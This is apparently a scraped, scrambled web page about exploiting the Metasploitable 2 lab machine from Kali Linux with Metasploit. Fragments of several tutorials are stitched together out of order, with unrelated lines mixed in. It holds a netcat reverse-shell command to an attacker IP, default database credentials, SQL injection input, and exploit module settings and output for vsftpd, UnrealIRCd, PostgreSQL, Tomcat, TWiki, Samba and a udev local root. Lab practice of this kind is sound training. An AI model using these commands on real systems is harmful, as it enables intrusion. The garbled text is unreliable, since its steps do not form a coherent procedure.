Getting access to a system with a writeable filesystem like this is trivial.
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
It is freely available and can be extended individually, which makes it very versatile and flexible. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
whoami
Vulnerability Management Nexpose Let's go ahead. In Metasploit, an exploit is available for the vsftpd version.
SMBUser no The username to authenticate as
NetlinkPID no Usually udevd pid-1. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH. Metasploit is a free open-source tool for developing and executing exploit code. Every CVE Record added to the list is assigned and published by a CNA. gcc root.c -o rootme (this compiles the C file into an executable binary) Step 12: Copy the compiled binary to the msfadmin directory in the NFS share. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. Step 9: Display all the columns fields in the .
Name Current Setting Required Description
Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. Exploit target:
Id Name
From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner.
Name Current Setting Required Description
So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. . msf exploit(postgres_payload) > exploit
Name Current Setting Required Description
[*] Started reverse double handler
VERBOSE false no Enable verbose output
THREADS 1 yes The number of concurrent threads
-- ----
now you can do some post exploitation. root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar [*] Writing to socket B
The CVE List is built by CVE Numbering Authorities (CNAs). It is a low-privilege shell; however, we can progress to root through the udev exploit, as demonstrated later. Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Utilizing login / password combinations supplied by the USER_FILE, PASS_FILE and USERPASS_FILE options, this module tries to authenticate against a PostgreSQL instance. To make this step easier, both the Nessus and Rapid7 NexPose scanners are used to locate potential vulnerabilities for each service. In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. Id Name
The advantage is that these commands are executed with the same privileges as the application. Login with the above credentials. RPORT 21 yes The target port
payload => java/meterpreter/reverse_tcp
The first of which installed on Metasploitable2 is distccd.
Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. Differences between Metasploitable 3 and the older versions. It requires VirtualBox and additional software. Id Name
So I'm going to exploit 7 different remote vulnerabilities; here is the list of vulnerabilities. Information about each OWASP vulnerability can be found under the menu on the left: For our first example we have toggled Hints to 1 and selected the A1- Injection -> SQLi Bypass Authentication -> Login vulnerability: Trying the SQL Injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors: This turns out to be due to a minor, yet crucial, configuration problem that impacts any database-related functionality. Module options (exploit/linux/local/udev_netlink):
Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. Metasploitable 2 is a straight-up download. [*] Accepted the second client connection
This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. Proxies no Use a proxy chain
STOP_ON_SUCCESS => true
msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. Module options (exploit/multi/http/tomcat_mgr_deploy):
Commands end with ; or \g. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. msf exploit(postgres_payload) > show options
Metasploitable Networking: The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
Attackers can execute arbitrary commands by supplying a username that includes shell metacharacters.
[*] Trying to mount writeable share 'tmp' [*] Trying to link 'rootfs' to the root filesystem [*] Now access the following share to browse the root filesystem: msf auxiliary(samba_symlink_traversal) > exit, root@ubuntu:~# smbclient //192.168.99.131/tmp, getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec). nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572
[*] Writing to socket B
Name Current Setting Required Description
This Command demonstrates the mount information for the NFS server.
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
msf exploit(twiki_history) > exploit
Least significant byte first in each pixel. So we got a low-privilege account. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
---- --------------- -------- -----------
Highlighted in red underline is the version of Metasploit. This is an issue many in infosec have to deal with all the time. On Metasploitable there were over 60 vulnerabilities, many of them similar to those on the Windows target. RPORT 8180 yes The target port
Id Name
The main purpose of this vulnerable application is network testing.
[*] Successfully sent exploit request
You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. .
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet.
We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak . It aids penetration testers in choosing and configuring exploits. -- ----
USERNAME no The username to authenticate as
Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application.
Mutillidae has numerous different types of web application vulnerabilities to discover, with varying levels of difficulty, to learn from and challenge budding pentesters. Let's first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. RHOSTS yes The target address range or CIDR identifier
In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. To proceed, click the Next button.
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
-- ----
LHOST => 192.168.127.159
Step 1: Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux.
[*] Started reverse handler on 192.168.127.159:4444
To access the web applications, open a web browser and enter the URL http://